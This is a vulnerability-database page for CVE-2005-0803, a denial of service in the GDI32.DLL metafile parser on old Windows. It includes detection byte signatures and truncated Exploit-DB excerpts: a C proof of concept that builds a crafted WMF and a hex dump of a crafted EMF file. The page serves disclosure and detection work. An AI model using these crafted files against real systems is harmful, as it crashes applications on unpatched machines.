CVE-2005-0803
published 2005-05-02CVE-2005-0803: The GetEnhMetaFilePaletteEntries API in GDI32.DLL in Windows 2000 allows remote attackers to cause a denial of service (application crash) via a crafted…
PriorityP431medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
70.77%
99.3th percentile
The GetEnhMetaFilePaletteEntries API in GDI32.DLL in Windows 2000 allows remote attackers to cause a denial of service (application crash) via a crafted Enhanced Metafile (EMF) file that causes invalid (1) end, (2) emreof, or (3) palent offsets to be used, aka "Enhanced Metafile Vulnerability."
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
d7 cd c6 9a 00 00 c6 fb ca 02 aa 02 39 09 e8 03 00 00 00 00 66 a6 01 00 09 00 00 03 ff ff ff 7f 00 00 ff ff ff ff 00 00
bytes↗
01 00 00 00 64 00 00 00 93 00 00 00 02 00 00 00 83 01 00 00 39 01 00 00 00 00 00 00 00 00 00 00 d1 08 00 00 be 06 00 00 20 45 4d 46 00 00 01 00 78 00 00 00 17 00 00 00 03 00 00 00 0f 00 00 00 64 00 00 00 41 00 00 00 c8 12 00 00 c2 1a 00 00 cc 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 00 00 14 00 00 00 41 00 00 00 41 42 43 44 00 00 01 ff
- →Crafted EMF file exploits GetEnhMetaFilePaletteEntries in GDI32.DLL via invalid end/emreof/palent offsets; detect malformed EMF files with anomalous palette entry offsets processed by gdi32.dll. ↗
- →The crafted EMF file contains the magic bytes '20 45 4d 46' (' EMF') at offset 0x28; combined with anomalous/truncated record structure (total size 0x78, only 17 records, ending with 00 00 01 ff), this can be used as a signature for the PoC file. ↗
- →WMF PoC file header starts with magic bytes 'd7 cd c6 9a'; combined with mtNoObjects=0x0000 at byte offset 26-27 of the WMF header, this pattern identifies the malicious WMF. ↗
- ·The EMF PoC (exploit 25231) targets Windows XP/2000/2003 via the vulnerable gdi32.dll; scope is limited to unpatched systems. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)
exploitdb·2005-11-30
CVE-2005-2124 Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)
Microsoft Windows Metafile - 'mtNoObjects' Denial of Service (MS05-053)
---
/*
* Author: Winny Thomas
* Pune, INDIA
*
* The crafted metafile (WMF) from this code when viewed in explorer crashes it. The issue is seen
* when the field 'mtNoObjects' in the Metafile header is set to 0x0000.
* The code was tested on Windows 2000 server SP4. The issue does not occur with the
* hotfix for GDI (MS05-053) installed.
*
* Disclaimer: This code is for educational/testing purposes by authorized persons on
* networks/systems setup for such a purpose. The author of this code shall not bear
* any responsibility for any damage caused by using this code.
*
*/
#include
unsigned char wmfheader[] =
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00" //mt
Exploit-DB
Microsoft Windows XP/2000/2003 - Graphical Device Interface Library Denial of Service
exploitdb·2005-03-17
CVE-2005-0803 Microsoft Windows XP/2000/2003 - Graphical Device Interface Library Denial of Service
Microsoft Windows XP/2000/2003 - Graphical Device Interface Library Denial of Service
---
source: https://www.securityfocus.com/bid/12834/info
Reportedly, a denial of service vulnerability affects Microsoft Windows GDI library 'gdi32.dll'. This issue is due to a failure of the application to securely copy data from malformed EMF image files.
An attacker may leverage this issue to trigger a denial of service condition in software implementing the vulnerable library. Other attacks may also be possible.
A hex dumped EMF file:
0000000 01 00 00 00 64 00 00 00 93 00 00 00 02 00 00 00
0000010 83 01 00 00 39 01 00 00 00 00 00 00 00 00 00 00
0000020 d1 08 00 00 be 06 00 00 20 45 4d 46 00 00 01 00
0000030 78 00 00 00 17 00 00 00 03 00 00 00 0f 00 00 00
0000040 64 00 00 00 41 00 00 00 c8 12 00 0
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=111108743527497&w=2http://secunia.com/advisories/14631http://secunia.com/advisories/17223http://secunia.com/advisories/17461http://securitytracker.com/id?1015168http://support.avaya.com/elmodocs2/security/ASA-2005-228.pdfhttp://www.kb.cert.org/vuls/id/134756http://www.osvdb.org/20580http://www.securityfocus.com/bid/12834http://www.us-cert.gov/cas/techalerts/TA05-312A.htmlhttp://www.vupen.com/english/advisories/2005/2348https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-053https://exchange.xforce.ibmcloud.com/vulnerabilities/19727https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1121https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1152https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1215https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1240https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A671http://marc.info/?l=bugtraq&m=111108743527497&w=2http://secunia.com/advisories/14631http://secunia.com/advisories/17223http://secunia.com/advisories/17461http://securitytracker.com/id?1015168http://support.avaya.com/elmodocs2/security/ASA-2005-228.pdfhttp://www.kb.cert.org/vuls/id/134756http://www.osvdb.org/20580http://www.securityfocus.com/bid/12834http://www.us-cert.gov/cas/techalerts/TA05-312A.htmlhttp://www.vupen.com/english/advisories/2005/2348https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-053https://exchange.xforce.ibmcloud.com/vulnerabilities/19727https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1121https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1152https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1215https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1240https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A671
2005-05-02
Published